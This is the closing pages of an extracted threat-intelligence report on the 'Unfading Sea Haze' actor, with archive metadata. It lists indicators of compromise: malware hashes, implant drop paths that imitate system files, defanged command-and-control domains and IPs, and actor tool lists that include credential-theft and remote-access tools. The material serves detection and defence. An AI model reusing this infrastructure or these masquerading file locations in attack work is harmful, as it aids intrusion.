EtherealGh0st\r\ncf5f2e3e1ce82e75a2d0885af5efa1ef EtherealGh0st\r\n3631001b60bdf712e6294d40ec777d87 EtherealGh0st\r\n4e470ea6d7d7da6dd4147c8e948df7c8 InsidiousGh0st\r\n73daf06fed93d542af04d59a4545fab0 FluffyGh0st\r\n100c461d79471c96eba20c8eae35c5ba FluffyGh0st\r\n40466fd795360ac4270751d8c4500c39 EtherealGh0st\r\ncb9e6fa194b8fa2ef5b6b19e0bd6873e EtherealGh0st\r\naf215f4670ae190e699c27e5205aadee Eventlog info extractor\r\n39d43f21b3c2b9f94165f5257b229fb4 EtherealGh0st\r\n3dc8d8a70cc60a2376ce5c555d242cf3 EtherealGh0st\r\n6f01bed0b875069ec5b9650e6d8c416f EtherealGh0st\r\n5f8f9269bcd52ef630bc563b83059b77 FluffyGh0st\r\nfa93aec0018c5e3d1d58b76af159bb82 FluffyGh0st\r\n846838327cda19b4415afd5b352c95df EtherealGh0st\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 13 of 18\n\n17303b1a254abb9ed0795f7d9b51b462 FluffyGh0st\r\n3decde2a91f52255dd97eaafc2666947 FluffyGh0st\r\nb98e54d01a094bb6b83eff06a8cf49d6 EtherealGh0st\r\nb1a886f8904d90ad28fce0dc0dc9df93 Ps2dllLoader\r\n5800fff782c36df785dad1d0a34ad418 Ps2dllLoader\r\n4b68c803db1b4222292adba3b2a1a03 EtherealGh0st\r\n6c49738668ca7c054f0708ecc3b626c8 SerialPktDoor loader\r\nd9a452c1c06903fafa4dc4625b2c2d9b EtherealGh0st\r\n91017ad856cff5f0cb304ea2a3ae81c9 FluffyGh0st\r\nf54bed43b372997f3bafe5c67c799e73 InsidiousGh0st\r\ncd0b810751eb2a1470e44f7f6660d5f4 InsidiousGh0st\r\n80fb9865209f8d8d1017c8151c79ef74 Network scanner\r\nc8c890cf8d61cab805e9ef0a4471579a EtherealGh0st\r\n0f4d06cedc93c7784580a3a7c4ad2fb4 InsidiousGh0st\r\nc182b3e659a416fe59f3613c08a8cffb InsidiousGh0st go variant\r\n942086934f4dd65c3e0158c9b8d89933 SharpZulip\r\n124bdaaa70da4daeacbc0513b6c0558e  \r\nFile Paths\r\nc:\\program files\\videolan\\vlc\\msftedit.dll\r\nc:\\programdata\\adobe\\arm\\arm.dll\r\nc:\\programdata\\coint.dll\r\nc:\\programdata\\epson\\setup\\msftedit.dll\r\nc:\\programdata\\microsoft\\devicesync\\msftedit.dll\r\nc:\\programdata\\microsoft\\network\\connections\\winsync.dll\r\nc:\\programdata\\microsoft\\servermanager\\events\\msftedit.dll\r\nc:\\programdata\\microsoft\\windows\\clipsvc\\genuineticket\\msftedit.dll\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 14 of 18\n\nc:\\programdata\\mscorsvc.dll\r\nc:\\programdata\\mscorsvw.exe\r\nc:\\programdata\\prod.dll\r\nc:\\programdata\\server.dll\r\nc:\\programdata\\ssh\\msftedit.dll\r\nc:\\programdata\\ssh\\setup.exe\r\nc:\\programdata\\ssh\\ssh.sys\r\nc:\\programdata\\stub.ps1\r\nc:\\programdata\\usoshared\\log.dll\r\nc:\\programdata\\usoshared\\logs\\mscorsvc.dll\r\nc:\\programdata\\usoshared\\uso.dll\r\nc:\\programdata\\winsync.dll\r\nc:\\python27\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\local\\adobe\\acrobat\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\local\\comms\\msftedit.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\local\\microsoft\\windows\\caches\\cversions.db\r\nc:\\users\\\u003cuser\u003e\\appdata\\local\\temp\\microsoftupdate.log\r\nc:\\users\\\u003cuser\u003e\\appdata\\roaming\\adobe\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\roaming\\brother\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\roaming\\microsoft\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\roaming\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\dbghelp.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\gro.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\m.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\mscorsvw.exe\r\nc:\\users\\\u003cuser\u003e\\desktop\\msftedit.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\s.dll\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 15 of 18\n\nc:\\users\\\u003cuser\u003e\\desktop\\servicemove64.exe\r\nc:\\users\\\u003cuser\u003e\\desktop\\sls\r\nc:\\users\\\u003cuser\u003e\\desktop\\sur.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\wh.exe\r\nc:\\users\\\u003cuser\u003e\\desktop\\yh.exe\r\nc:\\users\\\u003cuser\u003e\\downloads\\rea.dll\r\nc:\\users\\public\\downloads\\data.dll\r\nc:\\users\\public\\downloads\\mscorsvc.dll\r\nc:\\users\\public\\downloads\\notea.exe\r\nc:\\windows\\addins\\mscorsvc.dll\r\nc:\\windows\\cursors\\curs.cur\r\nc:\\windows\\debug\\wia\\vpn_bridge.config\r\nc:\\windows\\help\\help\\mscorsvc.dll\r\nc:\\windows\\help\\mscorsvc.dll\r\nc:\\windows\\ime\\server.dll\r\nc:\\windows\\livekernelreports\\mscorsvc.dll\r\nc:\\windows\\mscorsvc.dll\r\nc:\\windows\\policydefinitions\\mscorsvc.dll\r\nc:\\windows\\servicestate\\servicestate.dll\r\nc:\\windows\\setup\\cert.dll\r\nc:\\windows\\setup\\mscorsvc.dll\r\nc:\\windows\\system32\\dsc\\msftedit.dll\r\nc:\\windows\\system32\\grouppolicy\\datastore\\0\\sysvol\\\u003cdomain\u003e\\policies\\{31b2f340-016d-11d2-945f-00c04fb984f9}\\machine\\applications.dll\r\nc:\\windows\\system32\\mscorsvc.dll\r\nc:\\windows\\system32\\perceptionsimulation\\hid.dll\r\nc:\\windows\\system32\\perceptionsimulation\\hidserv.dll\r\nc:\\windows\\systemtemp\\mscorsvc.dll\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 16 of 18\n\nc:\\windows\\systemtemp\\winsat\\mscorsvc.dll\r\nem_nqiy9yrk_installer.msi\r\nrecorded.log\r\nDomain Names\r\nupupdate.ooguy[.]com\r\nfc.adswt[.]com\r\nmail.simpletra[.]com\r\nmail.adswt[.]com\r\napi.simpletra[.]com\r\nbit.kozow[.]com\r\nbitdefenderupdate[.]org\r\nauth.bitdefenderupdate[.]com\r\nmail.pcygphil[.]com\r\nmail.bomloginset[.]com\r\ndns-log.d-n-s.org[.]uk\r\nlinklab.blinklab[.]com\r\nlink.theworkguyoo[.]com\r\nmail.theworkguyoo[.]com\r\nsopho.kozow[.]com\r\nnews.nevuer[.]com\r\npayroll.mywire[.]org\r\nemployee.mywire[.]org\r\nairst.giize[.]com\r\ncdn.g8z[.]net\r\nmanags.twilightparadox[.]com\r\ndns.g8z[.]net\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 17 of 18\n\nmessage.ooguy[.]com\r\nspcg.lunaticfridge[.]com\r\nhelpdesk.fxnxs[.]com\r\nnewy.hifiliving[.]com\r\nimages.emldn[.]com\r\nword.emldn[.]com\r\nprovider.giize[.]com\r\nrest.redirectme[.]net\r\napi.bitdefenderupdate[.]org\r\nIP Addresses\r\n167.71.199[.]105\r\n188.166.224[.]242\r\n159.223.78[.]147\r\n128.199.166[.]143\r\n164.92.146[.]227\r\n192.153.57[.]24\r\n209.97.167[.]177\r\n112.113.112[.]5\r\n193.149.129[.]128\r\n128.199.66[.]11\r\n45.61.137[.]109\r\n139.59.107[.]49\r\n152.42.198[.]152\r\nSource: https://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/" ], "report_names": [ "deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea" ], "threat_actors": [ { "id": "f51de4ba-d3f5-4df7-ab5a-034b32584e48", "created_at": "2024-06-20T02:02:10.208158Z", "updated_at": "2026-04-10T02:00:04.960754Z", "deleted_at": null, "main_name": "Unfading Sea Haze", "aliases": [], "source_name": "ETDA:Unfading Sea Haze", "tools": [ "DustyExfilTool", "EtherealGh0st", "FluffyGh0st", "InsidiousGh0st", "Ps2dllLoader", "SerialPktdoor", "SharpJSHandler", "SharpZulip", "SilentGh0st", "Stubbedoor", "TranslucentGh0st", "xkeylog" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "cd48e0e6-b206-478d-bcb4-198be54bdf7a", "created_at": "2024-06-07T02:00:04.002734Z", "updated_at": "2026-04-10T02:00:03.644376Z", "deleted_at": null, "main_name": "Unfading Sea Haze", "aliases": [], "source_name": "MISPGALAXY:Unfading Sea Haze", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434426, "ts_updated_at": 1775826771, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4c50848a6102d1db0f0955630e8afcff7528c384.pdf", "text": "https://archive.orkl.eu/4c50848a6102d1db0f0955630e8afcff7528c384.txt", "img": "https://archive.orkl.eu/4c50848a6102d1db0f0955630e8afcff7528c384.jpg" } }